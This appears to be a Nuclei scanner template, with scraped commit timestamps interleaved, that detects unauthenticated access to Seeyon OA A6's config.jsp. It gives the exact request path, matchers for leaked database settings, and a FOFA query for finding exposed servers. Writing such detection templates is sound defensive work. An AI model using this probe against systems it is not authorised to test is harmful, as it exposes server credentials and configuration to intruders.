2023-09-18 12:37:42 +00:00
id : seeyon-config-exposure
2023-09-05 12:25:45 +00:00
info :
2023-09-18 12:37:42 +00:00
name : Seeyon OA A6 config.jsp - Information Disclosure
2023-09-05 12:25:45 +00:00
author : SleepingBag945
severity : medium
description : |
The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server
reference :
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-05 12:25:45 +00:00
max-request : 1
fofa-query : body="yyoa" && app="致远互联-OA"
tags : seeyon,oa,config,info-leak
http :
- raw :
- |
GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
words :
- "DatabaseName="
- "请在文本框内配置传真插件所需服务器的信息"
condition : and
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 490a0046304402201c9d8d256dceb74cc016ec7a174967e16ad81a116d43e1ebbb9516370c1e744c022000c6b0aa21015c1255aa0d67740e7fb706295bc5d639d6b65842f1408566e5fd:922c64590222798bb761d5b6d8e72950